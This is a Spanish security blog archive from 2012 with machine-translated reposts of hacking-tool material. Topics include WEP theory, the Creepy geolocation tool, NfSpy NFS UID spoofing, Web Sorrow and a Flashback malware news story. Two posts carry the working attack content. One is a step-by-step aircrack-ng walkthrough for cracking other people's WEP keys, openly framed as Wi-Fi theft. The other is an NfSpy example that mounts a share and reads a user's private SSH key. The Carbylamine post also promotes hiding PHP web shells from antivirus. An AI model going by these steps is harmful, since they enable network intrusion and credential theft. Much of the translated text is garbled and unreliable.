sábado, 28 de abril de 2012

Cifrado de Red

Saludos Mundo Libre.

He leido un articulo sobre el cifrado de redes wifi el texto es el siguiente:

WEP, acrónimo de Wired Equivalent Privacy o "Privacidad Equivalente a Cableado", es el sistema de cifrado incluido en el estándar IEEE 802.11 como protocolo para redes Wireless que permite cifrar la información que se transmite. Proporciona un cifrado a nivel 2, basado en el algoritmo de cifrado RC4 que utiliza claves de 64 bits (40 bits más 24 bits del vector de iniciación IV) o de 128 bits (104 bits más 24 bits del IV). Los mensajes de difusión de las redes inalámbricas se transmiten por ondas de radio, lo que los hace más susceptibles, frente a las redes cableadas, de ser captados con relativa facilidad. Presentado en 1999, el sistema WEP fue pensado para proporcionar una confidencialidad comparable a la de una red tradicional cableada.
Comenzando en 2001, varias debilidades serias fueron identificadas por analistas criptográficos. Como consecuencia, hoy en día una protección WEP puede ser violada con software fácilmente accesible en pocos minutos. Unos meses más tarde el IEEE creó la nueva corrección de seguridad 802.11i para neutralizar los problemas. Hacia 2003, la Alianza Wi-Fi anunció que WEP había sido reemplazado por Wi-Fi Protected Access (WPA). Finalmente en 2004, con la ratificación del estándar completo 802.11i (conocido como WPA2), el IEEE declaró que tanto WEP-40 como WEP-104 fueron revocados por presentar fallos en su propósito de ofrecer seguridad. A pesar de sus debilidades, WEP sigue siendo utilizado, ya que es a menudo la primera opción de seguridad que se presenta a los usuarios por las herramientas de configuración de los routers aún cuando sólo proporciona un nivel de seguridad que puede disuadir del uso sin autorización de una red privada, pero sin proporcionar verdadera protección. Fue desaprobado como un mecanismo de privacidad inalámbrico en 2004, pero todavía está documentado en el estándar actual.
WEP es a veces interpretado erróneamente como Wireless Encryption Protocol.

Detalles del Cifrado

WEP fue incluido como el método para asegurar la privacidad del estándar original IEEE 802.11 ratificado en septiembre de 1999. WEP usa el algoritmo de cifrado RC4 para la confidencialidad, mientras que el CRC-32 proporciona la integridad. El RC4 funciona expandiendo una semilla ("seed" en inglés) para generar una secuencia de números pseudoaleatorios de mayor tamaño. Esta secuencia de números se unifica con el mensaje mediante una operación XOR para obtener un mensaje cifrado. Uno de los problemas de este tipo de algoritmos de cifrado es que no se debe usar la misma semilla para cifrar dos mensajes diferentes, ya que obtener la clave sería trivial a partir de los dos textos cifrados resultantes. Para evitar esto, WEP especifica un vector de iniciación (IV) de 24 bits que se modifica regularmente y se concatena a la contraseña (a través de esta concatenación se genera la semilla que sirve de entrada al algoritmo).

El estándar WEP de 64 bits usa una llave de 40 bits (también conocido como WEP-40), que es enlazado con un vector de iniciación de 24 bits (IV) para formar la clave de tráfico RC4. Al tiempo que el estándar WEP original estaba siendo diseñado, llegaron de parte del gobierno de los Estados Unidos una serie de restricciones en torno a la tecnología criptográfica, limitando el tamaño de clave. Una vez que las restricciones fueron levantadas, todos los principales fabricantes poco a poco fueron implementando un protocolo WEP extendido de 128 bits usando un tamaño de clave de 104 bits (WEP-104).
Una clave WEP de 128 bits consiste casi siempre en una cadena de 26 caracteres hexadecimales (0-9, a-f) introducidos por el usuario. Cada carácter representa 4 bits de la clave (4 x 26 = 104 bits). Añadiendo el IV de 24 bits obtenemos lo que conocemos como “Clave WEP de 128 bits”. Un sistema WEP de 256 bits está disponible para algunos desarrolladores, y como en el sistema anterior, 24 bits de la clave pertenecen a IV, dejando 232 bits para la protección. Consiste generalmente en 58 caracteres hexadecimales. (58 x 4 = 232 bits) + 24 bits IV = 256 bits de protección WEP.
El tamaño de clave no es la única limitación de WEP. Crackear una clave larga requiere interceptar más paquetes, pero hay modos de ataque que incrementan el tráfico necesario. Hay otras debilidades en WEP, como por ejemplo la posibilidad de colisión de IV’s o los paquetes alterados, problemas que no se solucionan con claves más largas.

Autenticación

En el sistema WEP se pueden utilizar dos métodos de autenticación: Sistema Abierto y Clave Compartida.
Para más claridad hablaremos de la autenticación WEP en el modo de Infraestructura (por ejemplo, entre un cliente WLAN y un Punto de Acceso), pero se puede aplicar también al modo Ad-Hoc.
Autenticación de Sistema Abierto: el cliente WLAN no se tiene que identificar en el Punto de Acceso durante la autenticación. Así, cualquier cliente, independientemente de su clave WEP, puede verificarse en el Punto de Acceso y luego intentar conectarse. En efecto, la no autenticación (en el sentido estricto del término) ocurre. Después de la autenticación y la asociación, el sistema WEP puede ser usado para cifrar los paquetes de datos. En este punto, el cliente tiene que tener las claves correctas.
Autenticación mediante Clave Compartida: WEP es usado para la autenticación. Este método se puede dividir en cuatro fases: I) La estación cliente envía una petición de autenticación al Punto de Acceso. II) El punto de acceso envía de vuelta un texto modelo. III) El cliente tiene que cifrar el texto modelo usando la clave WEP ya configurada, y reenviarlo al Punto de Acceso en otra petición de autenticación. IV) El Punto de Acceso descifra el texto codificado y lo compara con el texto modelo que había enviado. Dependiendo del éxito de esta comparación, el Punto de Acceso envía una confirmación o una denegación. Después de la autenticación y la asociación, WEP puede ser usado para cifrar los paquetes de datos.
A primera vista podría parecer que la autenticación por Clave Compartida es más segura que la autenticación por Sistema Abierto, ya que éste no ofrece ninguna autenticación real. Sin embargo, es posible averiguar la clave WEP estática interceptando los cuatro paquetes de cada una de las fases de la autenticación con Clave Compartida. Por lo tanto es aconsejable usar la autenticación de Sistema Abierto para la autenticación WEP (nótese que ambos mecanismos de autenticación son débiles).

Defectos

El principal problema radica en que no implementa adecuadamente el vector de iniciación del algoritmo RC4, ya que utiliza un enfoque directo y predecible para incrementar el vector de un paquete a otro. Además existe un problema con el tamaño de los vectores de iniciación. A pesar de que se pueden generar muchos vectores, la cantidad de tramas que pasan a través de un punto de acceso es muy grande, lo que hace que rápidamente se encuentren dos mensajes con el mismo vector de iniciación. Conociendo los IV utilizados repetidamente y aplicando técnicas relativamente simples de descifrado puede finalmente vulnerarse la seguridad implementada. Aumentar los tamaños de las claves de cifrado aumenta el tiempo necesario para romperlo, pero no resulta imposible el descifrado.
Para atacar una red Wi-Fi se suelen utilizar los llamados Packet sniffers y los WEP Crackers. Para llevar a cabo este ataque se captura una cantidad de paquetes determinada (dependerá del número de bits de cifrado) mediante la utilización de un Packet sniffer y luego mediante un WEP cracker o key cracker se trata de “romper” el cifrado de la red. Un key cracker es un programa basado generalmente en matemáticas estadísticas que procesa los paquetes capturados para descifrar la clave WEP. Crackear una llave más larga requiere la interceptación de más paquetes, pero hay ataques activos que estimulan el tráfico necesario (envenenadores de ARP).
A pesar de existir otros protocolos de cifrado mucho menos vulnerables y más eficaces, como pueden ser el WPA o el WPA2, el protocolo WEP sigue siendo muy popular y posiblemente el más utilizado. Esto se debe a que WEP es fácil de configurar y cualquier sistema con el estándar 802.11 lo soporta. Sin embargo no ocurre lo mismo con otros protocolos, como WPA, que no es soportado por muchos dispositivos de red antiguos. El hardware moderno pasa entonces a utilizar el modelo de seguridad WEP para ser compatible con hardware de red anterior. Esto se da principalmente en las videoconsolas con conexión a Internet.

Evoluciones

Usado para el cifrado de protocolos de Tunneling (por ejemplo IPsec, o Secure SHell) puede proporcionar la transmisión de información segura sobre una red insegura. Sin embargo, las evoluciones de WEP han sido desarrolladas con el objetivo de restaurar la seguridad de la red inalámbrica.

802.11i (WPA y WPA2)

La solución recomendada para los problemas de seguridad WEP es cambiar a WPA2 o WPA. Cualquiera es mucho más seguro que WEP. Para utilizar WPA o WPA2, algunos viejos Puntos de Acceso Wi-Fi podrían tener que ser sustituidos o someterlos a una actualización de firmware.

Otras alternativas

WEP2

WEP2 usa cifrado y vector de iniciación de 128-bits. Esta mejora de WEP fue presentada tras los primeros modelos 802.11i. Éste se podía desarrollar sobre algunos (no todos) tipos de hardware que no eran capaces de manejar WPA o WPA2. Se esperaba que eliminase la deficiencia del duplicado de IV así como ataques a las claves por fuerza bruta. Sin embargo, como todavía se basaba en el algoritmo de cifrado RC4, aún mantenía las mismas vulnerabilidades que WEP.
Después de que quedara claro que el algoritmo WEP era deficiente y requeriría aún más correcciones, tanto WEP2 como el algoritmo original fueron desechados. Las dos longitudes de clave ampliadas formaron lo que más adelante se conocería como TKIP del WPA.

WEP Plus

Es una mejora WEP desarrollada por Agere Systems (anteriormente una filial de Lucent Technologies) que mejora la seguridad WEP evitando "IV’s débiles". Este protocolo es completamente eficaz únicamente cuando es usado a ambos extremos de la conexión inalámbrica. Como esto no es fácil de conseguir, representa una seria limitación. Es posible que tarde o temprano se logren ataques con éxito al sistema WEP+. Además no previene necesariamente los ataques de Replay.

WEP dinámico

En este caso las claves WEP cambian de forma dinámica. Cada cliente utiliza dos claves: una de asignación y una predeterminada. La clave de asignación se comparte entre el cliente y el punto de acceso, y protege las tramas unidifusión. La clave predeterminada es compartida por todos los clientes para proteger las tramas de difusión y multidifusión. WEP de clave dinámica ofrece ventajas significativas sobre las soluciones de WEP con clave estática. La más importante se refiere a que reduce el ámbito de cada clave. Las claves se utilizan con menos frecuencia y se reduce el compromiso de la clave utilizándola para proteger menos tráfico. Otra ventaja es que a intervalos periódicos las claves se actualizan en el punto de acceso. Es un sistema distribuido por algunas marcas comerciales como 3Com.
La idea del cambio dinámico se hizo dentro de 802.11i como parte de TKIP, pero no para el actual algoritmo WEP.

miércoles, 25 de abril de 2012

Windows 8

Saludos Mundo Libre.

Para todos aquellos que aman al sistema operativo windows esta libre la descarga de prueva de su nueva versión Windows 8 la descarga esta en : http://windows.microsoft.com/es-MX/windows-8/download
Para su prevía así que si les interesa pues a darle se ve bien con una integracion a las redes sociales y un ambiente gráfico muy agradable al usuario me parece excelente le han puesto mucho empeño ya que la competencia es muy amplia con Linux.

Pero ustedes tienen la ultima palabra sobre este sistema yo sigo prefiriendo o mejor me inclino sobre las plataformas libres como Linux.



Saludos Mundo Libre.

Creepy

Saludos Mundo Libre.

Quiero presentar esta herramienta Creepy.

Espeluznante  que la traduccion de Creepy es y será siempre libre y el software de código abierto. Si te sirve de ayuda lo suficiente, considere donar una pequeña cantidad para mantener el desarrollo en marcha. Gracias
Un agregador de información de geolocalización.
escalofriante es una aplicación que le permite recopilar información relacionada con la geolocalización de los usuarios de plataformas de redes sociales y servicios de alojamiento de imágenes. La información se presenta en un mapa dentro de la aplicación donde se muestra todos los datos recuperados acompañados con la información pertinente (es decir, lo que se envió desde esa ubicación específica) para proporcionar un contexto a la presentación.
 
Actualización
Versión 0.1.94 soluciona el problema con Twitter. Puedes descargarlo desde aquí.Asegúrese de eliminar la carpeta con el nombre espeluznante que se encuentra en la carpeta de inicio del usuario antes de instalar, si va a actualizar desde versiones anteriores
 

 
MapView con resultados




funcionamiento espeluznante en Windows XP

Características
Mapa disponibles los proveedores de: • Google Maps
• Mapas Virtuales
• Open Street Mapas
Ubicación retieval información de: • Twitter Tweet lugar
◦ Coordina al tweet fue enviada desde el dispositivo móvil◦ Lugar (nombre geográfico) derivado de IP de los usuarios al publicar en la interfaz web de Twitter. Lugar se traduce en coordenadas utilizando geonames.com◦ Caja envolvente deriva de IP de los usuarios al publicar en la web de Twitter de origen interface.The menos precisos, una esquina del rectángulo de selección se seleccionaron al azar.
• Localización geográfica accesible a través de la imagen API de servicios de alojamiento de información
• Las etiquetas EXIF ​​de las fotos publicadas.
Plataformas de redes sociales soportadas actualmente: • Twitter• Cuadrangular (sólo confirmaciones que se publican en Twitter)
• Gowalla (sólo confirmaciones que se publican en Twitter)
Servicios de alojamiento de imágenes soportados: • flickr - la información obtenida de la API
• twitpic.com - la información obtenida de la API y las etiquetas EXIF ​​de la foto
• yfrog.com - la información obtenida de las etiquetas EXIF ​​de fotos
• img.ly - la información obtenida de las etiquetas EXIF ​​de fotos
• plixi.com - la información obtenida de las etiquetas EXIF ​​de fotos
• twitrpix.com - la información obtenida de las etiquetas EXIF ​​de fotos
• foleext.com - la información obtenida de las etiquetas EXIF ​​de fotos
• shozu.com - la información obtenida de las etiquetas EXIF ​​de fotos
• pickhur.com - la información obtenida de las etiquetas EXIF ​​de fotos
• moby.to - la información obtenida de la API y las etiquetas EXIF ​​de la foto
• twitsnaps.com - la información obtenida de las etiquetas EXIF ​​de fotos
• twitgoo.com - la información obtenida de las etiquetas EXIF ​​de fotos

El almacenamiento en caché automático de la información obtenida a fin de reducir llamadas a la API y la posibilidad de limitar los índices de hiting.

Interfaz gráfica de usuario con el mapa navigateable para una mejor visión de la información acumulada

4 mapas (incluyendo los proveedores de Google Maps) para su uso.

Lugares abiertos en Google Maps en tu navegador

Exportación recuperar lista de ubicaciones como KMZ (para Google Earth) o csv.

Manejo de autenticación de Twitter en una manera fácil de usar OAuth. Las credenciales de usuario no se comparten con la aplicación.

Usuario / destino de búsqueda de Twitter y Flickr.

Renuncia
Espeluznante se ofrece como una herramienta de PoC. El uso de la herramienta con fines maliciosos, tales como el acecho no recibe la aprobación o la promoción.
Al utilizar este software, usted acepta que su intención es crear conciencia y para ser utilizado como una herramienta educativa. Con espeluznante para ningún propósito ilegal o no ético está estrictamente prohibido y el desarrollador no asume ninguna responsabilidad. El autor declina toda responsabilidad por cualquier acción de los usuarios finales. Es responsabilidad del usuario final a obedecer todas las leyes estatales aplicables y legales.
Descargar e instalar el software significa que ha leído y estar deacuerdo con la advertencia anterior y la licencia de software.

Fuente:http://ilektrojohn.github.com/creepy/

Traduccion: Dellcom1@

jueves, 19 de abril de 2012

NfSpy - un ID de cliente NFS-spoofing

Saludos Mundo Libre.

NfSpy - un ID de cliente NFS-spoofing.

NfSpy es un programa de biblioteca / que utiliza el sistema de archivos en espacio de usuario (FUSE) para automatizar la biblioteca de la falsificación de credenciales de montaje NFS cuando un recurso compartido NFS.La vulnerabilidad explotada
NFS antes de la versión 4 es dependiente en las relaciones de confianza de acogida para la autenticación. El servidor NFS confía en los equipos cliente para autenticar a los usuarios y asignar los identificadores de usuario (UID mismos) que el sistema de archivos compartidos que utiliza. Esto funciona en NIS, NIS +, LDAP y los dominios, por ejemplo, pero sólo si usted sabe que la máquina cliente no está en peligro, o fingiendo su identidad. Esto se debe a la autenticación sólo en el protocolo NFS es la aprobación de la UID y el GID (ID de grupo). Hay algunas cosas que se pueden hacer para mejorar la seguridad de NFS, pero muchas de ellas son soluciones incompletas, e incluso con las tres mencionadas anteriormente, aún podría ser posible para eludir las medidas de seguridad.Squash raíz
El servidor o la participación de la ("exportación" en la jerga de NFS) se puede configurar squash_root, lo que significa que todas las solicitudes que llegan al afirmar que el UID o GID 0 (root) será tratado como el usuario nobody, o su equivalente en el sistema. Esto no impide que un atacante la suplantación de cualquier otro UID / GID combinado, sino que protegen la información más sensible y configuraciones de la exportación.nfs_portmon
Otra opción que se puede activar es nfs_portmon, que rechaza las peticiones procedentes de los puertos de origen fuera del rango 513-1024. Dado que sólo root puede (por lo general) asignar estos puertos, esto impide que un usuario normal en un equipo de confianza de la escritura y el uso de su propio cliente de NFS que las falsificaciones UID / GID. No hace nada para detener una gran pícaro, un usuario con permisos de la UB, o una máquina de nivel raíz comprometida de hacer lo mismo.Restricciones a la exportación
Las acciones y las exportaciones puede ser controlado de modo que sólo determinadas máquinas puedan acceder a ellos. Estas listas de control de acceso pueden consistir en:

    
Las direcciones IP (por ejemplo, 192.168.1.34)
    
Prefijos IP (por ejemplo, @ 192.168.1)
    
nombres de host (por ejemplo, server1.mydom.nis)
    
las listas de acogida (por eje @ trusted_hosts)
    
"Todo el mundo"
La mejor configuración sería utilizar una lista de host, ya que la consulta el demonio nfs acaba de dar el nombre de la lista no, que direcciones o nombres que contiene. Siguiente en la línea sería direcciones IP o los nombres de host, ya que son más difíciles de falsificar. Prefijos IP y "todos" son indicadores de la inseguridad, ya que hay poca o ninguna restricción en lo que las direcciones se pueden conectar.Usando NfSpy
Una lista de opciones puede verse mediante la ejecución
nfspy - help
Ejemplo
No es un servidor NFS en 192.168.1.124.
$ Showmount-e 192.168.1.124Exportar lista de 192.168.1.124:/ Home (todos)
Montar el recurso compartido. Utilizar sudo le permite unirse a un puerto privilegiado, y la opción allow_other permite a cualquier usuario utilizar el sistema de archivos. La otra opción nueva aquí es "esconder", que de inmediato "desmonta" la participación en el servidor, pero mantiene el gestor de archivo que tiene. Esto oculta su presencia de cualquier persona que use showmount-a
$ Sudo nfspy-o servidor = 192.168.1.124 :/ home, cuero, allow_other, ro, intr / mnt
Disfrute de su nueva libertad!
$ Cd / mnt/ Mnt $ ls-ldrwx ------ 74 8888 200 4096 2011 -03-03 09:55 smithj/ Mnt $ cd smithj/ Mnt / smithj $ cat .ssh / id.rsa----- BEGIN RSA PRIVATE KEY -----Proc-Type: 4, CIFRADODEK-Info: DES-EDE3-CBC, 30AEB543E512CA19
Para desmontar, utilice fusermount:
$ Sudo-u fusermount / mnt
Ejemplo avanzado
No es un servidor NFS en 192.168.1.124. Portmap está bloqueado, por lo que no puede obtener una lista de acciones, pero se puede escuchar el tráfico de la red.
$ Sudo tshark-n-i eth0-T campos-e nfs.fhandleEjecutar como usuario "root" y grupo "root". Esto podría ser peligroso.La captura de eth001:00:04:00:01:00:22:00: E5: 03: d8: 9d: 00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:0001:00:04:01:01:00:22:00: E5: 03: d8: 9d: 07:00:22:00:15:83:74: d5: 00:00:00:00:00: 00:00:00:00:00:00:0001:00:04:01:01:00:22:00: E5: 03: d8: 9d: 07:00:22:00:15:83:74: d5: 00:00:00:00:00: 00:00:00:00:00:00:00
^ C3 paquetes capturados
Ahora usa el dirhandle y las opciones de montaje GetRoot evitar el uso de el demonio de montaje, y utilice la opción nfsport evitar el uso del mapeador de puertos, que atraviesa el árbol de directorios a la raíz de la exportación.
$ Sudo nfspy-o mnt
Tenga en cuenta que no nos proporcionan un camino para montar, ya que todos sabemos es el gestor de archivo NFS.FALLOS

    
El acceso de escritura es beta. Ha trabajado en mis pruebas en un puñado de sistemas, pero podría utilizar más pruebas. Debido a esto, los valores predeterminados NfSpy para montaje de transbordo. Especifique la opción rw mount para cambiar esta situación.

    
NfSpy no funciona con los servicios estándar lockd y statd, lo que podría causar problemas con la escritura a los archivos. Por sólo lectura, sin embargo, y la mayoría de los usos nefastos para que se pretendía, esto no debería ser un problema.

    
NfSpy sólo es compatible con NFSv3 en este momento. Las versiones futuras de forma inteligente puede elegir una versión de NFS.


Fuente:https://github.com/bonsaiviking/NfSpy

Descarga:https://github.com/bonsaiviking/NfSpy

Traduccion:Dellcom1@.

Saludos Mundo Libre. 

martes, 17 de abril de 2012

Hacking redes wifi

Saludos Mundo LIbre.

Ya he hablado muchas ocasiones del robo de redes wifi me he encontrado un articulo sobre esta teme que me gustaria compartir el texto dice:


Cambiar la MAC de nuestra tarjeta wireless:

Abrimos un terminal y ponemos:
macchanger -m MAC QUE QUERAMOS [interfaz]
Ejemplo:
macchanger -m 00:01:02:03:04:05 wlan0

Ponemos la tarjeta en modo monitor para poder coger los paquetes

Como en el anterior manual dijimos…
airmon-ng start [interfaz]
Ejemplo:
airmon-ng start wlan0
Hacker WiFi Chop Chop

Abrimos airodump para apuntar canal, bssid y el ssid

Abrimos airodump-ng, desde Inicio/Wireless/suite/airodump-ng y vemos todos los wifis que hay a nuestro alrededor, apuntamos el canal que usa el wifi que queremos auditar así como el bssid y el ssid de dicha red wifi.

Ahora abrimos una consola (o terminal) y ponemos lo siguiente:
airodump-ng -c CANAL -b BSSID -w NOMBRE CAPTURA [interfaz]
Ejemplo:
airodump-ng -c 3 -b 00:02:CF:43:23 -w captura wlan0
Dejamos este terminal abierto hasta el final, no lo cerréis.

Nos asociamos a la red wifi (Asociación Falsa)

Ahora procedemos a asociarnos al AP con la MAC falseada que hemos hecho antes.
aireplay-ng -1 10 -e SSID -a BSSID -h MAC QUE TENEMOS (FALSA) [interfaz]
Ejemplo:
aireplay-ng -1 10 -e Gorrion -a 00:02:CF:13:41 -h 00:01:02:03:04:05 wlan0
Dejamos esta consola abierta, igual que la de airodump, NO LAS CERRÉIS!!!
Hacker WiFi Chop Chop

Lanzamos el ataque chop chop

Ahora vamos a lanzar este ataque para conseguir un paquete WEP.
Abrimos la consola y ponemos:
aireplay-ng -4 -h MAC QUE TENEMOS (FALSA) [interfaz]
Hacker WiFi Chop Chop
Nos pedirá que si queremos ese paquete WEP que ha cogido, debemos mirar que el BSSID que tiene es el mismo que el que hemos seleccionado nosotros, si lo es, ponemos [y] y le damos a enter, entonces comenzará el proceso (tarda 1 minuto aproximadamente), cuando termine creará dos ficheros en root, uno con extensión .CAP y otro con extensión .XOR.
Hacker WiFi Chop Chop
Hacker WiFi Chop Chop
No cerréis la consola, porque si lo hacéis luego os tiraréis de los pelos…

Saber la IP de la red wifi

Ahora vamos a ver qué IP usa nuestra WIFI, si ya sabemos que es la de toda la vida (192.168.1.1) podemos saltarnos este paso.
tcpdump -s 0 -n -e -r ARCHIVO.CAP
Hacker WiFi Chop Chop
Como el nombre del archivo .cap es tan largo, copiamos (de la consola anterior) y pegamos aquí. Pulsamos intro y os saldrán muchas cosas, aunque identificaréis fácilmente la IP de la red wifi.

Fabricar paquete ARP para inyectarlo

Fabricaremos un paquete ARP con los datos del AP y los nuestros para posteriormente inyectarlo con aireplay.
packetforge-ng -0 -a BSSID -h MAC QUE TENEMOS (FALSA) -k IP DEL AP -l IP DEL RANGO -y ARCHIVO.XOR (copiar y pegar del terminal abierto de antes) -w NOMBRE PAQUETE
Hacker WiFi Chop Chop
Ejemplo:
packetforge-ng -0 -a 00:02:CF:13:15 -h 00:01:02:03:04:05 -k 192.168.1.1 -l 192.168.1.10 -y replay_etc.xor -w paquete

Inyección del paquete ARP fabricado

Procedemos a la inyección del paquete ARP fabricado anteriormente para conseguir IVs
aireplay-ng -2 -x 1024 -h MAC QUE TENEMOS (FALSA) -r ARCHIVO ARP FORJADO [interfaz]
Y le damos a enter, nos dirá que si queremos usarlo, ponemos [y] y le damos a enter para confirmar.
Ejemplo:
aireplay-ng -2 -x 1024 -h 00:01:02:03:04:05 -r paquete wlan0
Hacker WiFi Chop Chop
En la captura como veis en lugar de 1024 tengo 300, eso es porque algunos AP no soportan tanto tráfico y se saturan, yo empezaría por 300 y luego subiendo de 300 en 300 hasta llegar a lo máximo (1024), en este caso, yo llegué a 1024 y no tuve ningún problema.
Hacker WiFi Chop Chop

Esperar a que haya suficientes IVs

Ahora esperamos hasta que los #data de la pantalla del airodump (la que NO hemos cerrado antes) suban hasta un número decente.
Como sube rápido y no nos cuesta nada esperar, yo lo dejaría hasta llegar al millón (para asegurarnos que la clave la podrá sacar aircrack).

Ejecutamos Aircrack-ng para conseguir la clave

Ahora ejecutamos aircrack para conseguir la clave, abrimos otra consola y ponemos:
aircrack-ng captura-01.cap
Hacker WiFi Chop Chop
Tenéis que poner el nombre de la captura que habéis puesto anteriormente en el airodump, si no os acordáis o habéis cerrado, iros a /root y ahí veréis el archivo .cap, tomáis nota de su nombre y lo ponéis.
En pocos minutos tendréis la clave.
Fijaos la diferencia de IVs y el corto espacio de tiempo, en 8 minutos, hemos captado más de 250.000 IVs.

Cuando HAY clientes conectados No-Chop-chop

Si la red wifi tiene un cliente asociado lo mejor es hacer la re-inyección de paquetes ARP, es igual que el chop-chop pero no hay que trabajarlo tanto para forjar el paquete etc.
Re-inyección de paquetes ARP:
aireplay-ng -3 -b BSSID -h MAC DEL CLIENTE ASOCIADO [interfaz]
Ejemplo:
aireplay-ng -3 -b 00:02:CF:69:69 -h 00:02:CE:11:11 wlan0
No tiene por qué ser instantáneo, esperad un poco, unos 4 o 5 minutos sería más que suficiente, os digo lo mismo que antes, algunas veces este tipo de ataques no funcionan con determinados puntos de acceso o redes wifi.

Últimos comentarios sobre este manual

Suerte con este método para conseguir tráfico, ya que a veces no sale a la primera, y ni tan siquiera siempre sale…depende del punto de acceso.
Si el aircrack no ha sido capaz de sacar la clave con un millón de IVs (poco probable), esperad hasta llegar a un millón y medio y lo hará (y si no sale, ponlo en el foro a ver qué está pasando).
Con esto terminamos la auditoría wireless con cifrado WEP, espero que os haya sido útil, y sobre todo, que os hayáis divertido tanto como nosotros.
   
Autor: Sergio de Luz.

Fuente:http://www.redeszone.net/seguridad-informatica/hackear-una-red-wifi-sin-clientes-conectados-aprende-a-hackear-una-red-wifi-sin-clientes-mediante-el-ataque-chop-chop/

Espero lo disfruten.


Saludos Mundo Libre

lunes, 16 de abril de 2012

Web Sorrow

Saludos Mundo Libre.

Web Sorrow- de lectura remota de Seguridad Web (Enumeración / Versión etc detección)


en la web el sorrow es una herramienta basada en Perl utilizados para el control de un servidor Web para una configuración errónea, la detección de versiones, la enumeración y la información del servidor. No es un escáner de vulnerabilidades, el proxy de inspección, la herramienta de DDoS o de un marco de explotación.



 Funcionalidad actual

-S - es sinónimo de norma. un conjunto de pruebas estándar e incluye: la indexación de directorios de las pruebas, asir de la bandera, la detección de idioma (que debería ser obvio), robots.txt, y 200 pruebas de respuesta (algunos servidores se puede enviar un 200 por cada req)

-Eb - es sinónimo de ensacado de error. La configuración predeterminada para los servidores es poner el demonio del servidor y la versión e incluso a veces dentro del SO de las páginas de error. Web dolor reqs una URL de 20 bytes al azar con métodos GET y POST.

-auth - busca las páginas de inicio de sesión con una lista de algunos de los archivos de inicio de sesión más comunes y directorios. No hace falta ser muy grande la lista de direcciones URL, porque ¿qué otra cosa se ​​va a nombrar?

◦ Los de cmsPlugins - ejecuta una enorme lista de directorios plugins para los servidores cms. la lista es un poco viejo (2010)

-I - busca las respuestas para las cadenas de interés

-WS - busca los servicios web, tales como el proveedor de hosting, servicios de blogs, huellas digitales favicon, y la información de la versión de CMS

-FD - buscar las cosas por lo general la gente no quiere que usted vea. La lista se genera formar una tonelada de robot.txt así que cualquier cosa que encuentre debe ser interesante.

-proxy - enviar solicit http a través de un proxy. ejemplo: 255.255.255.254:8080

-e - ejecutar todas las exploraciones en el escáner

Internet también tiene dolor de cheques falsos positivos en la mayoría de las solicitudes (que es lo bastante precisa, pero no perfecta).

Ejemplos

básica:

perl Wsorrow.pl-host domain.com-S

Buscar páginas de inicio de sesión:
perl Wsorrow.pl-host domain.com-auth

a analizar más intenso:
perl Wsorrow.pl-host domain.com-e

Puede descargar en :http://code.google.com/p/web-sorrow/

Fuente: http://code.google.com/p/web-sorrow/

Trduccion: Dellcon1@

Saludos Mundo Libre.

martes, 10 de abril de 2012

Saludos Mundo Libre.

Hoy quiero ablar de una Herramienta Para PHP.

Carbylamine - Es Un codificador de secuencias de comandos PHP para "Ofuscación / codificar los archivos de PHP
 
Carbylamine es un proyecto PHP Encoder, que puede pasar por alto todos los principales antivirus de detección contra depósitos de PHP (C99, R57, etc) con facilidad. Puede ser una herramienta muy eficaz para los auditores de redes al llevar a cabo una prueba de recuadro negro, que implica la inserción de código malicioso a través de PHP.

Carbylamine - Encoder Script PHP para ocultar / codificar archivos PHP

USO

carbylamine.php [archivo para codificar] [archivo de salida]

Puede descargar Carbylamine Desde su pagina: http://code.google.com/p/carbylamine/











El uso de esta herramienta es muy sencilla y sin complicacion.

Fuente:http://code.google.com/p/carbylamine/




Traduccion: Dellcom1@



Saludos Mundo Libre

martes, 3 de abril de 2012

Vulnerabilidad Java

Saludos Mundo Libre.

En el siguiente articulo se encontro una vulnerabilidad en java el articulo dice.

Sin parchear la vulnerabilidad de Java para infectar ordenadores Mac explotados con malware Flashback 
La variante Flashback.K se distribuyen a través de exploits para una conocida vulnerabilidad de Java que Apple aún tiene que arreglar
. ¿Qué es esto?
Existe una vulnerabilidad de Java que aún no ha sido parcheado por Apple está siendo explotada por los ciberdelincuentes para infectar ordenadores Mac con una nueva variante del malware Flashback, de acuerdo con los investigadores de seguridad de la firma de antivirus F-Secure.
Flashback es un caballo de Troya para Mac OS equipo que apareció por primera vez en septiembre de 2011. La primera variante se distribuyó como un falso instalador de Flash Player, pero el malware ha cambiado significativamente desde entonces, tanto en términos de funcionalidad y métodos de distribución.
INFORME: Las muestras únicas de malware rompió la marca de 75 millones en 2011
En febrero pasado, varias compañías antivirus informó que una versión nueva de Flashback se está distribuyendo a través de Java hazañas, lo que significa que el proceso de infección interacción con el usuario ya no es necesario.
Las vulnerabilidades de Java dirigidos por la explota febrero se remonta a 2009 y 2011, para que los usuarios con instalaciones de hasta al día de Java fueron protegidos.
Sin embargo, eso ya no es el caso de la última variante del malware, Flashback.K, que se distribuye mediante la explotación de una vulnerabilidad sin parchear en Java, los investigadores de seguridad de F-Secure dijo en un blog el lunes.
Oracle lanzó una solución para la vulnerabilidad específica, que es identificado como CVE-2012-0507, en febrero y fue incluido en una actualización para la versión Windows de Java.
Sin embargo, desde que Apple distribuye una versión auto-compilado de Java para Mac, sus puertos de parches de Oracle para que de acuerdo a su propio horario, que puede ser de meses detrás de la otra para Java en Windows.
Los expertos en seguridad han advertido que este retraso en la entrega de los parches de Java en Mac OS podría ser utilizado por los creadores de malware para su beneficio, y el nuevo software malicioso Flashback.K confirma que tenían razón.
Después de que se cayó y se ejecuta en el sistema a través del exploit CVE-2012-0507, el nuevo caballo de Troya provoca una ventana de diálogo que pide al usuario su contraseña administrativa.
Independientemente de si el usuario introduce la contraseña o no, el malware infecta el sistema, F-Secure dijo que en su descripción de los programas maliciosos. El objetivo del troyano es en sí inyectar en el proceso de Safari y modificar el contenido de determinadas páginas web.
Hay rumores de que un nuevo exploit para una vulnerabilidad sin parchear diferentes Java que se venden actualmente en el mercado negro y podría ser utilizada para combatir los usuarios de Mac de una manera similar en el futuro, los F-Secure dijeron los investigadores.
"Si aún no lo ha inhabilitado su cliente Java, por favor hágalo antes de que esto realmente se convierten en un brote", dijeron. La compañía antivirus proporciona instrucciones sobre cómo hacer esto.
Apple dejó como Java por defecto en Mac OS X desde la versión 10.7 (León). Sin embargo, si los usuarios León encontrarse con una página web que requiere de Java, se les pide que descargue e instale el tiempo de ejecución y más tarde puede olvidar que lo tienen en sus equipos.







Fuente:http://www.networkworld.com/news/2012/040212-unpatched-java-vulnerability-exploited-to-257866.html?source=nww_rss


Traduccion: Dellcom1@


Saludos Mundo Libre.

